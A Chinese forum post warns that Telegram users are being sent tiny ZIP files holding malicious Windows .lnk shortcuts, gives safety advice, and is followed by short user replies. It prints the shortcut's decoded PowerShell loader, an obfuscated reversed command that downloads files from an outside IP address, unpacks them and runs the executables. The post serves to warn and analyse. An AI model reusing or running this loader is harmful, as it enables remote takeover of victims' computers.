近期telegram有人大肆传播lnk病毒

Author: zs448 - Posted:6小时前 - View:31

文件特征如下描述

一个zip压缩包,名字任意。但是压缩包非常小,小于10KB。

点开后里面是lnk文件,该文件为Windows平台专用,本质上是可执行任意指令的快捷方式。点击后你的电脑会变成肉鸡,入侵者可随意远程控制你的电脑。

所以遇到体积过小的压缩包,你又在使用Windows平台的话,请务必不要打开!推荐去把Windows的隐藏已知后缀取消,不要点击陌生lnk文件。

同时,推荐前往Windows telegram客户端关闭自动下载。

通过中标的人把lnk文件分享出来,写的啥?有懂的没?

1、目标执行程序

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2、原始参数(只截取前200字符,太多了)

-NoP -ep Bypass -w h -EncodedCommand  JAByAGUAdgAgAD0AIAAnADsAIgBlAHgAZQAuAGQAcwBsAG8AbwB0AG0AdgBcAFwAQwBNAE0AXABcAHQAZgBvAHMAbwByAGMAaQBNAFwAXABBAFQAQQBEAFAAUABBADoAdgBuAGUAJAAiACAAJgA7ACIAZQB…

3、以下是解码后的PowerShell命令

$rev = ';"exe.dslootmv\\CMM\\tfosorciM\\ATADPPA:vne$" &;"exe.tropghc\\CMM\\tfosorciM\\ATADPPA:vne$" &;ecroF- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" metI-evomeR ;ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" htaPnoitanitseD- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" htaP- evihcrA-dnapxE;gnisraPcisaBesU- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" o- "piz.1IJIZ/541.821.221.}BS{$}vv{$}ca{$" lruc;}lluN-tuO|ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" yrotceriD epyT- metI-weN  {))"CMM\\tfosorciM\\ATADPPA:vne$" htaP-tseT( ton-( fi ;gnisraPcisaBesU- "txt.明说\\htaPlacol$" o- "txt.明说/541.821.221.}BS{$}vv{$}ca{$" lruc;"431//:"=BS$;"gnisra"=ll$;"Pci"=kk$;"saB"=jj$;"esU-"=hh$;"p"=vv$;"tth"=ca$;"jdh"=jdh$;"juh"=juh$;"jDSh"=ERh$;"ertry"=dsef$;"eeewssy"=ssef$;"eesarreefdssy"=ssgfdf$;"eesacvd"=ssghild$;"teydhs"=DHSTRY$;"tolyghbs"=erfgy$;"dpolls"=fedsaa$;"dujtd"=ADSdRFD$;"sarfvc"=uuuhfb$;"sartrrtkj"=utvvyyyyhnd$;"sarKJHj"=utvvyyyHBnA$;"sarKFHj"=utADHBnA$;"sar"=utA$;"sarK"=utAd$;ecroF- "knl.txt.明说\\htaPlacol$" htaP- metI-evomeR ;htaP.)noitacoL-teG( = htaPlacol$'
$cmm = -join $rev[-1..-$rev.Length]
Invoke-Expression $cmm

4、图标伪装成下列形式

.\1.txt

5、文件描述(可能是垃圾数据)

JMjbdLxqqm1lDDqudandas

6、文件的一些时间信息

  • 创建时间 : 2023-06-26 10:13:29.233510+00:00
  • 修改时间 : 2023-06-26 10:13:29.233510+00:00
  • 访问时间 : 2023-06-26 10:13:29.233510+00:00

7、原始文件大小显示为323584字节

8、分布式链接追踪信息(机器标识等)

  • 机器标识符 : TESTMACHINE01234
  • Droid卷标识: 0C703587-9D5D-40F3-8021-0578FC96DDFD
  • Droid文件标识: D811239A-DCEC-4EF7-B3C9-55B9814E0699
0 人点赞  ∙  0 人收藏  
加入收藏 点赞 我要评论

目前共有 5 条回复

aerph
- aerph - 1小时前

用win版纸飞机的应该容易中招,像我基本不接触这软件,不会碰到这种情况,不止这样,不熟悉的东西不要轻易去点它,问题应该不大的,就算中招了也不怕,只有系统有备份,随时恢复就行

dosmoking
- dosmoking - 1小时前

看不懂,也不想看懂,单个词看都认识,堆在一起完全不知道,不用TG

zls511234
- zls511234 - 1小时前

楼主大大,62.giftelegram是啥?可以传给我看看吗?

zls511238
- zls511238 - 57分钟前

之前在群里有看过,有很长一段时间了吧,最近又开始传播了?39.gif,只有电脑上安装杀毒软件,会自动拦截的,个人不要太自信,必要时杀毒软件可以救救的

zls511255
- zls511255 - 50分钟前

前不久我的tg帐号被盗了,虽然不是这种病毒,是那种以exe结尾的,我好像是要找啥需要的软件来着,然后就双击exe的应用程序,然后就没有然后了,对这些制造病毒的真是咬牙切齿的深恶痛觉30.gif30.gif30.gif